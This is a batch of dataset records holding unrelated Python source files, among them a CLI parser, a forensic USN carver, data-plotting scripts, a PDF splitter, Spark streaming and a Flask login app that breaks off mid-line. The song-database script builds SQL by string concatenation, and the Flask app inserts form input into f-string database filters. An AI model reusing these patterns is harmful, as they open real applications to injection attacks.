+{"seq_id":"305976397","text":"import argparse\nfrom typing import Type\nfrom dataclasses import dataclass\n\nfrom pyinsights.__version__ import __version__\n\n\n@dataclass\nclass CliOption:\n config: str\n fmt: str\n profile: str\n region: str\n quiet: bool\n output: str\n\n\ndef parse_args() -> Type[CliOption]:\n \"\"\"Parse arguments\n\n Returns:\n Type[CliOption]\n \"\"\"\n\n parser = argparse.ArgumentParser(\n prog=\"pyinsights\",\n description=\"AWS CloudWatch Logs Insights is wrapped by Python\",\n )\n\n parser.add_argument(\n \"-c\",\n \"--config\",\n required=True,\n default=\"pyinsights.yml\",\n help=\"PyInsights config file path\",\n )\n\n parser.add_argument(\n \"-f\",\n \"--format\",\n choices=[\"json\", \"table\"],\n default=\"json\",\n dest=\"fmt\",\n help='Output format \"json\" or \"table\"',\n )\n\n parser.add_argument(\"-p\", \"--profile\", help=\"AWS profile name\")\n\n parser.add_argument(\"-r\", \"--region\", help=\"AWS region\")\n\n parser.add_argument(\"-o\", \"--output\", help=\"Output the result to file\")\n\n parser.add_argument(\n \"-q\",\n \"--quiet\",\n action=\"store_true\",\n help=\"Suppress progress spinner and messages\",\n )\n\n parser.add_argument(\n \"-v\", \"--version\", action=\"version\", version=__version__\n )\n\n return parser.parse_args(namespace=CliOption)\n","sub_path":"pyinsights/cli/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"392588775","text":"from six.moves import builtins\n\nc1 = complex()\nd1 = dict()\nf1 = float()\ni1 = int()\nl1 = list()\ns1 = str()\nt1 = tuple()\n\nc2 = builtins.complex()\nd2 = builtins.dict()\nf2 = builtins.float()\ni2 = builtins.int()\nl2 = builtins.list()\ns2 = builtins.str()\nt2 = builtins.tuple()\n","sub_path":"testing/resources/builtin_constructors.py","file_name":"builtin_constructors.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"55211818","text":"#!/usr/bin/python\n\nimport os\nimport sys\nimport mmap\nimport struct\nimport contextlib\nfrom argparse import ArgumentParser\n\ndef carveUsnRecords(inFile, outFile):\n with contextlib.closing(mmap.mmap(inFile.fileno(), 0, access=mmap.ACCESS_READ)) as m:\n offset = 0\n while True:\n offset = m.find(b'\\x00\\x00\\x02\\x00\\x00\\x00', offset)\n if offset == -1:\n break\n\n if m.find(b'\\x00\\x3c\\x00', offset + 55, offset + 58) == -1:\n offset +=1\n continue\n\n offset -= 2\n recordLength = struct.unpack(' 570:\n offset += 3\n continue\n\n outFile.write(m[offset:offset + recordLength])\n offset += (recordLength)\n\ndef main():\n p = ArgumentParser()\n p.add_argument(\"-f\", \"--file\", help=\"Carve USN records from the given file\", required=True)\n p.add_argument(\"-o\", \"--outfile\", help=\"Output to the given file\", required=True)\n args = p.parse_args()\n with open(args.file, \"rb\") as i:\n with open(args.outfile, \"ab\") as o:\n carveUsnRecords(i, o)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"usn_carve.py","file_name":"usn_carve.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"392971050","text":"import numpy as np\nimport time\n\nA = np.ones((10000, 10000), order='F')\n\nt0 = time.time()\n\nfor i in range(10000):\n A[:,i] *= 2.0 # scaling each column\n\nprint(time.time()-t0) # 0.119 second\n\nt0 = time.time()\nfor i in range(10000):\n A[i, :]*= 2.0 # scaling each row\n\nprint(time.time()-t0) # 1.574 seconds\n","sub_path":"Chap_11_Numpy/Chap_11_Numpy_RowStorage.py","file_name":"Chap_11_Numpy_RowStorage.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"372632900","text":"from Entreprise import Entreprise\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndata = dict()\nfor a in range(1993, 2017):\n for m in range(12):\n for j in range(31):\n nomfichier = str(a)\n if (m + 1) < 10:\n nomfichier += '0' + str(m + 1)\n else:\n nomfichier += str(m + 1)\n if (j + 1) < 10:\n nomfichier += '0' + str(j + 1)\n else:\n nomfichier += str(j + 1)\n\n try:\n f = open(\"data/\"+ nomfichier +\".txt\", 'r')\n print(\"Importation du fichier\", nomfichier)\n i = 0\n for l in f:\n l = l[:-1]\n l = l.split('\\t')\n key = l[0]\n if key not in data:\n data[key] = Entreprise(key, l[1])\n data[key].add_ouverture(a, m+1, j, l[2])\n except:\n pass\n\nfig, axs = plt.subplots(nrows=2, ncols=1, sharex=True, sharey=True)\nx = np.arange('2016-01-01', '2016-12-31', dtype='datetime64[D]')\nkeys = ['ES0109429037', 'FR0010425595']\n\nlists = [[], []]\nolds = [0, 0]\nfor d in list(x):\n date = str(d).split('-')\n print(date)\n for i in range(2):\n k = keys[i]\n v = data[k].ouvertures[int(date[0])][int(date[1])][int(date[2])-1]\n if v != None:\n olds[i] = v\n lists[i].append(olds[i])\n\nfor i in range(2):\n axs[i].plot(x, lists[i], label=data[keys[i]].libele)\n axs[i].legend()\n\nplt.show()\n","sub_path":"tp-big-data/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"160515613","text":"from typing import List\n\nfrom k8s_handle.templating import get_template_contexts\nfrom k8s_handle.exceptions import ResourceNotAvailableError\n\nfrom .resource_getters import AbstractResourceGetter\n\n\nclass ResourceAvailabilityChecker(object):\n\n def __init__(self, resources_getters: List[AbstractResourceGetter]):\n self.resources = resources_getters\n self.versions = {}\n\n def _is_available_kind(self, api_group: str, kind: str) -> bool:\n kinds = []\n for api in self.resources:\n if api.is_processable_version(api_group):\n kinds = api.get_resources_by_version(api_group)\n\n return kind in kinds\n\n def run(self, file_path: str):\n for template_body in get_template_contexts(file_path):\n if not self._is_available_kind(template_body.get('apiVersion'), template_body.get('kind')):\n raise ResourceNotAvailableError(\n \"The resource with kind {} is not supported with version {}. File: {}\".format(\n template_body.get('kind'), template_body.get('apiVersion'), file_path\n )\n )\n","sub_path":"k8s_handle/k8s/availability_checker/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"363822917","text":"#!/usr/bin/python3\r\n\r\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\r\n\r\npdf_document = \"X.pdf\"\r\npdf = PdfFileReader(pdf_document)\r\n\r\n# Output files for new PDFs\r\noutput_filename_even = \"even_reversed.pdf\"\r\noutput_filename_odd = \"odd.pdf\"\r\n\r\npdf_writer_even = PdfFileWriter()\r\npdf_writer_odd = PdfFileWriter()\r\n\r\n# Get reach page and add it to corresponding\r\n# output file based on page number\r\nfor page in range(pdf.getNumPages()):\r\n if page % 2 == 0:\r\n current_page = pdf.getPage(page)\r\n pdf_writer_odd.addPage(current_page)\r\n\r\nfor page in reversed(range(pdf.getNumPages())):\r\n if page % 2 != 0:\r\n current_page = pdf.getPage(page)\r\n pdf_writer_even.addPage(current_page)\r\n\r\n# Write the data to disk\r\nwith open(output_filename_even, \"wb\") as out:\r\n pdf_writer_even.write(out)\r\n print(\"created\", output_filename_even)\r\n\r\n# Write the data to disk\r\nwith open(output_filename_odd, \"wb\") as out:\r\n pdf_writer_odd.write(out)\r\n print(\"created\", output_filename_odd)","sub_path":"SplitPDF-odd-reversedeven/Odd_ReverseEven_PDF.py","file_name":"Odd_ReverseEven_PDF.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"76886448","text":"import pandas as pd\nimport numpy as np\nimport re\n\ntotal = pd.read_csv('total2.csv')\nfor DeleteAttribute in ['开发商',\"物业类型\",\"总建面积\", \"总户数\", \"建造年代\", \"物业公司\", \"商圈\"]:\n del total[DeleteAttribute]#,'商圈','物业公司']\n#区 地址 每平米价格 竣工日期 物业费 停车位 容积率 绿化率\n# 除了 每平米价格 竣工日期 是数字, 其他都是str,需要转化\npattern_wuyefei = re.compile(r'\\s*(\\d+\\D\\d+)\\D+')\npattern_lvhualv = re.compile(r'\\s*(\\d+)\\D+')\n\nj = 0\nfor i in total['物业费']:\n i = str(i)\n if pattern_wuyefei.search(i) != None:\n total['物业费'][j] = float(pattern_wuyefei.search(i).group(1))\n else:\n total['物业费'][j] = 0\n j = j + 1\n\nj = 0\nfor i in total['停车位']:\n try:\n if i == '暂无数据' or i == None:\n total['停车位'][j] = 0\n else:\n total['停车位'][j] = float(i)\n except:\n ValueError\n j = j + 1\n\nj = 0\nfor i in total['容积率']:\n try:\n if i == '暂无数据' or i == None:\n total['容积率'][j] = 0\n else:\n total['容积率'][j] = float(i)\n j = j + 1\n except:\n ValueError\n\ntotal.to_csv('total3.csv')\n","sub_path":"districts/preprocess2.py","file_name":"preprocess2.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"442917299","text":"\"\"\"Use SQL database to store songs scrapped from billboards\"\"\"\n# USAGE: change the CONST parameters in connect to match your database, Use the execute function to execute sql code\nimport psycopg2\nfrom scrap import Scrapper\n\n# -- establish a connection to SQL database --\ndef connect(db=\"music\", user=\"JuliaC\", host=\"127.0.0.1\", port=5432):\n \"\"\" Connect to the PostgreSQL database server \"\"\"\n conn = None\n try:\n print('Connecting to the PostgreSQL database...')\n conn = psycopg2.connect(host=host, database=db, user=user, port=port)\n print(\"connection successful\\n\")\n\n # ---> here is where functions can go to update or scan the database\n dumpV3(conn)\n info(conn)\n # ---> end\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"Error: \", error)\n finally:\n if conn is not None:\n conn.close()\n print('Database connection closed.')\n\n\n# heres where we can put SQL commands inside a cursor object\n# Documentation for Cursor class: http://initd.org/psycopg/docs/cursor.html\n# psql commands: http://www.postgresqltutorial.com/psql-commands/\n\n\n# -- take songs off buildboards and place them into database\ndef dumpV3(conn):\n cur = conn.cursor()\n\n # --- drop tables ---\n cur.execute(\"DROP TABLE IF EXISTS popularity;\")\n cur.execute(\"DROP TABLE IF EXISTS songs;\")\n print(\"--> Cleared tables\")\n\n # --- create song table ---\n table_commands = \"(id SERIAL NOT NULL, title text NOT NULL, artist text NOT NULL ,PRIMARY KEY (id), UNIQUE(title, artist));\"\n cur.execute(\"CREATE TABLE songs\" + table_commands)\n print(\"--> Created songs table\")\n table_commands = \"(songId integer REFERENCES Songs(id),year integer NOT NULL, rank integer NOT NULL, PRIMARY KEY (songId, year), UNIQUE(songId, year), UNIQUE(year, rank));\"\n\n # --- top100 years data ---\n for year in range(1980, 2016):\n # -- load data --\n url = 'http://billboardtop100of.com/' + str(year) + '-2/'\n s = Scrapper(url)\n s.get_rows_SQL() # puts songs into s.table, type: array\n # loop through songs\n for song in s.table:\n # -- insert into songs table --\n inserts = \"INSERT INTO songs(title, artist)\"\n values = \"VALUES(\" \"'\" + song.song + \"', \" + \"'\" + song.artist + \"'\" + \")\"\n cur.execute(inserts + values + \" ON CONFLICT(title, artist) DO NOTHING;\")\n print(\"Added top100 songs for year \", year)\n cur.close()\n conn.commit()\n print(\"changes committed\")\n\n\ndef info(conn):\n cur = conn.cursor()\n # -- run executes to gain info --\n print(\"Running information methods: \")\n cur.execute(\"select * from song ORDER BY songid, year ASC;\")\n\n # -- iterate and print --\n for song in cur:\n print(song) # cur object is iterable\n cur.close()\n\n\n# run script, must set parameters if not using defaults\nif __name__ == '__main__':\n connect(db=\"music\", user=\"JulianC\")\n\n\n","sub_path":"sqltopy.py","file_name":"sqltopy.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"495022164","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import mode\nfrom scipy.spatial import Voronoi, Delaunay\n\nfrom .alpha_shape import alphashape_edges\n\n\n# add 4 corner points\ndef add_corner_points(pts, pad=0.05):\n center = pts.mean(axis=0)\n pts_ = pts - center\n vmax = np.abs(pts_).max() * (1 + pad)\n p1 = (-vmax, -vmax)\n p2 = (+vmax, -vmax)\n p3 = (+vmax, +vmax)\n p4 = (-vmax, +vmax)\n p1234 = np.array([p1, p2, p3, p4])\n pts_new = np.vstack([pts, p1234 + center])\n return pts_new\n\n\ndef locate_vnn_idx(ridge_points_pairs, ii):\n return np.where((ridge_points_pairs[:, 0] == ii) | (ridge_points_pairs[:, 1] == ii))[0]\n\ndef sort_inds(inds, pts):\n inds_ = []\n for i, row in enumerate(inds):\n if row[0] != -1:\n pp = pts[row] - pts[i]\n angles = np.arctan2(pp[:, 1], pp[:, 0]) + np.pi\n row_ = row[np.argsort(angles)]\n inds_.append(row_)\n else:\n inds_.append([-1])\n return inds_\n\nclass VorNeighbors:\n\n def __init__(self, pts, lbs=None, threshold=0.05, alpha=None):\n # input points\n self.pts = pts\n # input points add 4 corners\n self.pts_ = add_corner_points(self.pts)\n\n\n # lbs\n if lbs is None:\n self.lbs = np.ones(len(self.pts)) * (-1)\n else:\n self.lbs = lbs\n\n self.lbs_ = np.hstack([self.lbs, [-1] * 4])\n\n\n # boundary indices from alpha shape\n self.boundary = alphashape_edges(pts, alpha)\n\n\n # Voronoi model, generated from pts_, NOT pts\n vor = Voronoi(self.pts_)\n\n # ridges: number of ridges = len(vor.ridge_vertices)\n ridge_vertices_pairs = np.array(vor.ridge_vertices)\n ridge_points_pairs = np.array(vor.ridge_points)\n\n # calculate all ridge lengths\n p12 = vor.vertices[ridge_vertices_pairs[:, 0]] - vor.vertices[ridge_vertices_pairs[:, 1]]\n L = np.hypot(p12[:, 0], p12[:, 1])\n\n # L = np.hypot(p12[:, 0], p12[:, 1])[:, np.newaxis]\n # pairs = np.hstack([ridge_points_pairs, ridge_vertices_pairs, L])\n\n self.inds = []\n for ii in range(len(self.pts)):\n if ii not in self.boundary:\n idx = locate_vnn_idx(ridge_points_pairs, ii)\n # remove neighbors with a small edge\n aa = ridge_points_pairs[idx, 0:2]\n aa[aa == ii] = 0\n bb = aa.sum(axis=1).astype(int)\n l = L[idx]\n s = l / l.sum()\n self.inds.append(bb[s > threshold])\n else:\n self.inds.append([-1])\n\n # sort by angle\n self.inds = sort_inds(self.inds, self.pts_)\n\n self.ks = np.array([len(e) for e in self.inds])\n self.k = mode(self.ks).mode[0]\n\n def get_mols(self, t=0.01):\n mols = []\n\n k_max = np.max([len(row) for row in self.inds]) + 1\n for i, row in enumerate(self.inds):\n a = np.array([-1] * k_max)\n if row[0] == -1:\n mols.append(a)\n else:\n ind = [i] + [e for e in row]\n mol = self.lbs[ind]\n a[0:len(row) + 1] = mol\n mols.append(a)\n\n mols = np.array(mols)\n\n mols_, cnts = np.unique(mols, axis=0, return_counts=True)\n mols_ = mols_[np.argsort(cnts)[::-1]]\n cnts_ = cnts[np.argsort(cnts)[::-1]]\n # remove boundary\n idx = np.where(np.all(mols_ == [-1] * mols_.shape[1], axis=1))[0][0]\n mols_ = np.delete(mols_, idx, axis=0)\n cnts_ = np.delete(cnts_, idx)\n mask = cnts_/(cnts_.sum()) > t\n return mols_[mask], cnts_[mask]\n\n def get_all_mols(self):\n mols = []\n\n k_max = np.max([len(row) for row in self.inds]) + 1\n for i, row in enumerate(self.inds):\n a = np.array([-1] * k_max)\n if row[0] == -1:\n mols.append(a)\n else:\n ind = [i] + [e for e in row]\n mol = self.lbs[ind]\n a[0:len(row) + 1] = mol\n mols.append(a)\n\n mols = np.array(mols)\n return mols\n\n def show_k(self, ax=None, **kwargs):\n if ax is None:\n fig, ax = plt.subplots(1, 1, figsize=(7.2, 7.2))\n\n ks = self.ks.copy()\n ks[ks == 1] = 100\n ksmin = ks.min()\n ks = ks - (ksmin - 1)\n ks[ks > 100 - ksmin - 1] = 0\n cs = np.array(['#2d3742'] + ['C{}'.format(i) for i in range(9)])\n ax.scatter(self.pts[:, 0], self.pts[:, 1], color=cs[ks], **kwargs)\n\n\n\n\n\n\n\n# use Delaunay to get vnn, but difficult to get L\ndef get_voronoi_nbrs(pts):\n tri = Delaunay(pts)\n indptr, inds = tri.vertex_neighbor_vertices\n vnn = []\n # indptr has a shape (npoints + 1,)\n for i in range(len(indptr) - 1):\n vnn.append(list(inds[indptr[i]:indptr[i + 1]]))\n return vnn","sub_path":"spatial/voronoi_neighbors.py","file_name":"voronoi_neighbors.py","file_ext":"py","file_size_in_byte":4865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"301667342","text":"#!/usr/bin/env python\n\n# read a stream from a local host\nfrom pyspark.sql.functions import explode, split\nimport pyspark\n\nimport logging\nlogging.basicConfig(level=logging.WARNING)\nlogger = logging.getLogger('ai.applecare')\nlogger.setLevel(logging.DEBUG)\n\nlogger.debug('setup spark')\nspark = (pyspark.sql.SparkSession\n .builder\n .appName('ch2 read stram')\n .getOrCreate())\n\nspark.sparkContext.setLogLevel('INFO')\n\nport = 8888\nlogger.debug(f'read Stream from {port}')\nlines = (spark\n .readStream\n .format('socket')\n .option('host', 'localhost')\n .option('port', port)\n .load())\n\n# Perform transformations\n# Split the lines into words\n\nlogger.info('Exploding words')\nwords = lines.select(\n explode(split(lines.value, \" \"))\n .alias(\"word\"))\n\nlogger.info('word counts')\n# Generate running word count\nword_counts = words.groupBy('word').count()\n\n\nlogger.info('kafka query')\n# write out to the stream to Kafka\nquery = (word_counts\n .writeStream\n .format('kafka')\n .option('topic', 'output'))\n\n\n","sub_path":"lrn-spark/notebooks/ch1-lrn-spark-read-stream.py","file_name":"ch1-lrn-spark-read-stream.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"66112296","text":"#Vigenere Decrypt\r\n\r\ndef decrypt(key,text):\r\n result=[]\r\n key_index = 0\r\n #letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\r\n letters = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ ',.!1234567890[]}{@#£$%^&*?()_+abcdefghijklmnopqrstuvwxyz\"\r\n\r\n\r\n for letter in text:\r\n num = letters.find(letter)\r\n num -= letters.find(key[key_index])\r\n num %= len(letters)\r\n\r\n result.append(letters[num])\r\n\r\n key_index += 1\r\n if key_index == len(key):\r\n key_index = 0\r\n \r\n\r\n return''.join(result)\r\n","sub_path":"fileencrypter/PyVigDec.py","file_name":"PyVigDec.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"402949253","text":"# Python 3\r\n# -*- coding: utf-8 -*-\r\nfrom PIL import Image, ImageDraw, ImageFont\r\nfrom random import randint\r\nfrom wordcloud_handler.colourscale import Colourscale\r\nfrom wordcloud_handler.fontsize import FontSize\r\n\r\n\r\nclass RandomizedWordCloud(object):\r\n\r\n def create_wordcloud(self, words, wordcounts, colourscale, docname):\r\n image = Image.new(\"RGB\", (1250,600), (0, 10, 30))\r\n draw = ImageDraw.Draw(image)\r\n colourscale_index = 0\r\n fontsizes = FontSize().proportion_fontsize(wordcounts)\r\n counter = 1\r\n\r\n ax_collector = []\r\n bx_collector = []\r\n ay_collector = []\r\n by_collector = []\r\n dx_collector = []\r\n dy_collector = []\r\n\r\n ax = randint(70, 850) \r\n ay = randint(50, 500)\r\n\r\n fontsize = fontsizes[0]\r\n font = ImageFont.truetype('Trebuchet MS.ttf', fontsize)\r\n text = words[0] + \"(\" + str(int(wordcounts[0])) + \")\"\r\n wordwidth, wordheight = font.getsize(text)\r\n\r\n draw.text((ax, ay), words[0] + \"(\" + str(int(wordcounts[0])) + \")\", font=font, fill=(colourscale[0][colourscale_index],colourscale[1][colourscale_index],colourscale[2][colourscale_index]))\r\n\r\n by = ay\r\n bx = ax + wordwidth\r\n dx = ax + wordwidth\r\n dy = by + wordheight\r\n\r\n ax_collector.append(ax)\r\n ay_collector.append(ay)\r\n bx_collector.append(bx)\r\n by_collector.append(by) \r\n dx_collector.append(dx) \r\n dy_collector.append(dy)\r\n\r\n index = 0\r\n check = 0\r\n collector_endindex = 0 \r\n\r\n while collector_endindex < len(ax_collector) and counter < len(words):\r\n fontsize = fontsizes[counter]\r\n font = ImageFont.truetype('Trebuchet MS.ttf', fontsize)\r\n text = words[counter] + \"(\" + str(int(wordcounts[counter])) + \")\"\r\n wordwidth, wordheight = font.getsize(text)\r\n\r\n colourscale_index = Colourscale().get_colourscale_index(fontsize, fontsizes)\r\n\r\n # Kontrollstrukturen zur Gewährleistung, dass es an zu keiner Wortüberschneidung kommt\r\n if ax <= ax_collector[index] and dx >= ax_collector[index] and ay <= ay_collector[index] and ay <= dy_collector[index] or \\\r\n ax >= ax_collector[index] and ax <= dx_collector[index] and ay <= ay_collector[index] and dy >= ay_collector[index] or \\\r\n ax <= ax_collector[index] and dx >= ax_collector[index] and ay >= ay_collector[index] and ay <= dy_collector[index] or \\\r\n ax >= ax_collector[index] and ax <= dx_collector[index] and ay >= ay_collector[index] and ay <= dy_collector[index] or \\\r\n ax >= ax_collector[index] and dx <= dx_collector[index] and ay >= ay_collector[index] and ay <= dy_collector[index] or \\\r\n ax >= ax_collector[index] and dx <= dx_collector[index] and ay <= ay_collector[index] and ay <= dy_collector[index] or \\\r\n ax < ax_collector[index] and dx > dx_collector[index] and ay >= ay_collector[index] and dy <= dy_collector[index] or \\\r\n ax < ax_collector[index] and dx > dx_collector[index] and ay < ay_collector[index] and dy > dy_collector[index]:\r\n check = 1\r\n index = index + 1\r\n collector_endindex = collector_endindex + 1\r\n else:\r\n index = index + 1\r\n collector_endindex = collector_endindex + 1\r\n if collector_endindex == len(ax_collector) and check == 0:\r\n draw.text((ax, ay), words[counter] + \"(\" + str(int(wordcounts[counter])) + \")\", font=font, fill=(colourscale[0][colourscale_index],colourscale[1][colourscale_index],colourscale[2][colourscale_index]))\r\n\r\n by = ay\r\n bx = ax + wordwidth\r\n dx = ax + wordwidth\r\n dy = by + wordheight\r\n\r\n ax_collector.append(ax)\r\n ay_collector.append(ay)\r\n bx_collector.append(bx)\r\n by_collector.append(by)\r\n dx_collector.append(dx)\r\n dy_collector.append(dy)\r\n\r\n counter = counter + 1\r\n if collector_endindex == len(ax_collector) and check == 1:\r\n ax = randint(70, 850) \r\n ay = randint(50, 500)\r\n\r\n by = ay\r\n bx = ax + wordwidth\r\n dx = ax + wordwidth\r\n dy = by + wordheight\r\n\r\n check = 0\r\n collector_endindex = 0\r\n index = 0\r\n\r\n #image.show()\r\n image.save(\"{}.png\".format(docname))\r\n","sub_path":"wordcloud_handler/randomlayout_wordcloud.py","file_name":"randomlayout_wordcloud.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"363517441","text":"def longest_intersection(n):\r\n long_inter = []\r\n for _ in range(n):\r\n\r\n first, second = input().split(\"-\")\r\n first_start, first_end = map(int, first.split(\",\"))\r\n second_start, second_end = map(int, second.split(\",\"))\r\n\r\n first = []\r\n second = []\r\n\r\n for i in range(first_start, first_end + 1):\r\n first.append(i)\r\n\r\n for x in range(second_start, second_end + 1):\r\n second.append(x)\r\n\r\n inter = set(first) & set(second)\r\n\r\n if len(long_inter) < len(inter):\r\n long_inter = list(inter)\r\n\r\n print(f'Longest intersection is {long_inter} with length {len(long_inter)}')\r\n\r\n\r\nlongest_intersection(int(input()))","sub_path":"Python_ProgramingAdvanced/Tuples and Sets - Exercises/6. Longest Intersection.py","file_name":"6. Longest Intersection.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"494216326","text":"# -*- coding: UTF-8 -*-\n\nimport os\nimport re\nimport csv\nimport pandas as pd\nimport numpy as np\nimport pyexcel_io\nfrom pyexcel_xls import get_data\nfrom pyexcel_xls import save_data\nimport xlrd\n# 遍历指定目录,显示目录下的所有文件名\ndef eachFile2(filepath):\n pathDir = os.listdir(filepath)\n for allDir in pathDir:\n child = os.path.join(\"%s\\%s\" % (filepath, allDir))\n if os.path.isdir(child):\n eachFile(child)\n else:\n '''\n #if re.search('AU',child,re.M|re.I)!=None and re.search('test',child,re.M|re.I)==None:\n if re.search('AU', child, re.M | re.I) != None or \\\n re.search('log', child, re.M | re.I) != None\\\n or re.search('BDI', child, re.M | re.I) != None\\\n or re.search('实验记录表', child, re.M | re.I) != None:'''\n if re.search('log', child, re.M | re.I) != None:\n print(child)\n readFile1(child, filepath)\n # else:\n # os.remove(child)\n\n#def readFile1(filename,filepath):\n\n\ndef eachFile(filepath):\n pathDir = os.listdir(filepath)\n for allDir in pathDir:\n child = os.path.join(\"%s\\%s\" % (filepath, allDir))\n if os.path.isdir(child):\n eachFile(child)\n else:\n '''\n #if re.search('AU',child,re.M|re.I)!=None and re.search('test',child,re.M|re.I)==None:\n if re.search('AU', child, re.M | re.I) != None or \\\n re.search('log', child, re.M | re.I) != None\\\n or re.search('BDI', child, re.M | re.I) != None\\\n or re.search('实验记录表', child, re.M | re.I) != None:'''\n if re.search('AU', child, re.M | re.I) != None:\n print(child)\n readFile(child,filepath)\n #else:\n #os.remove(child)\n\n\n# 读取文件内容并打印\ndef readFile(filename,filepath):\n Line=[]\n fopen = open(filename, 'r') # r 代表read\n for eachLine in fopen:\n lines=eachLine.split(',')\n Line.append(lines)\n fopen.close()\n Lines=np.array(Line)\n x=Lines.shape[0]\n y=Lines.shape[1]\n #print(x)\n #print(y)\n sum=[0]*19\n max=[-100]*19\n min=[100]*19\n variance=[0]*19\n average=[0]*19\n print(sum)\n for j in range(0,y-1):\n for i in range(1,x):\n #print(Lines[i][j])\n sum[j]=float(Lines[i][j])+sum[j]\n if float(Lines[i][j])>max[j]:\n max[j]=float(Lines[i][j])\n if float(Lines[i][j]) 0\"\n )\n return render_template(\"index.html\", products=products)\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for(\"index\"))\n\n form = forms.LoginForm(request.form)\n\n if request.method == \"POST\" and form.validate():\n try:\n user = SecureDB.retrieve(\n model=\"User\",\n filter_=f\"User.username == '{form.username.data}'\",\n )[0]\n except:\n flash(\n \"Incorrect username and/or password. Please try again.\",\n \"danger\",\n )\n return redirect(url_for(\"login\"))\n\n salt = user.password[-6:]\n salted_password = form.password.data + salt\n\n if not check_password_hash(user.password[:-6], salted_password):\n flash(\n \"Incorrect username and/or password. Please try again.\",\n \"danger\",\n )\n return redirect(url_for(\"login\"))\n\n redirect_to_profile = False\n\n with open(\"PwnedPasswordTop100k.txt\", \"r\", encoding=\"UTF-8\") as file:\n for insecure_password in file.read().splitlines():\n if form.password.data == insecure_password:\n flash(\n \"Your password is easily guessable or has been \"\n \"compromised in a data breach. Please change your \"\n \"password as soon as possible.\",\n \"danger\",\n )\n redirect_to_profile = True\n\n if not user.status:\n SecureDB.update(\n model=\"User\",\n filter_=f\"User.username == '{form.username.data}'\",\n values={\"status\": True},\n )\n\n login_user(user, remember=form.remember.data)\n\n if redirect_to_profile:\n return redirect(url_for(\"profile\"))\n\n next_url = request.args.get(\"next\")\n\n if next_url is not None and is_safe_url(next_url):\n return redirect(next_url)\n\n return redirect(url_for(\"index\"))\n\n return render_template(\n \"login.html\", form=form, next=request.args.get(\"next\")\n )\n\n\n@app.route(\"/signup\", methods=[\"GET\", \"POST\"])\ndef signup():\n if current_user.is_authenticated:\n return redirect(url_for(\"index\"))\n\n form = forms.RegisterForm(request.form)\n\n if request.method == \"POST\" and form.validate():\n if not (\n SecureDB.retrieve(\n model=\"User\",\n filter_=f\"User.username == '{form.username.data}'\",\n )\n or SecureDB.retrieve(\n model=\"User\", filter_=f\"User.email == '{form.email.data}'\"\n )\n ):\n letters_and_digits = string.ascii_letters + string.digits\n salt = \"\".join(\n (secrets.choice(letters_and_digits) for _ in range(6))\n )\n salted_password = form.password.data + salt\n hashed_password = generate_password_hash(\n salted_password, method=\"sha256\"\n )\n hashed_password_with_salt = hashed_password + salt\n new_user = User(\n username=form.username.data,\n email=form.email.data,\n password=hashed_password_with_salt,\n date_created=datetime.datetime.now(),\n status=True,\n )\n\n created_user = SecureDB.create(model=\"User\", object_=new_user)\n\n customer_role = SecureDB.retrieve(\n model=\"Role\", filter_=\"Role.name == 'Customer'\"\n )[0]\n user_role = UserRole(\n user_id=created_user.id,\n role_id=customer_role.id,\n role=customer_role,\n )\n\n SecureDB.create(model=\"UserRole\", object_=user_role)\n return redirect(url_for(\"login\"))\n\n return redirect(url_for(\"signup\"))\n\n return render_template(\"signup.html\", form=form)\n\n\n@app.route(\"/logout\", methods=[\"POST\"])\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for(\"index\"))\n\n\n@app.route(\"/profile\", methods=[\"GET\", \"POST\"])\n@login_required\ndef profile():\n form = forms.UpdateForm(request.form)\n\n if request.method == \"POST\" and form.validate():\n salt = current_user.password[-6:]\n salted_password = form.current_password.data + salt\n\n if check_password_hash(current_user.password[:-6], salted_password):\n if form.email.data != \"\":\n SecureDB.update(\n model=\"User\",\n filter_=f\"User.id == {current_user.id}\",\n values={\"email\": form.email.data},\n )\n\n if form.username.data != \"\":\n SecureDB.update(\n model=\"User\",\n filter_=f\"User.id == {current_user.id}\",\n values={\"username\": form.username.data},\n )\n\n if form.new_password.data != \"\":\n letters_and_digits = string.ascii_letters + string.digits\n salt = \"\".join(\n (secrets.choice(letters_and_digits) for _ in 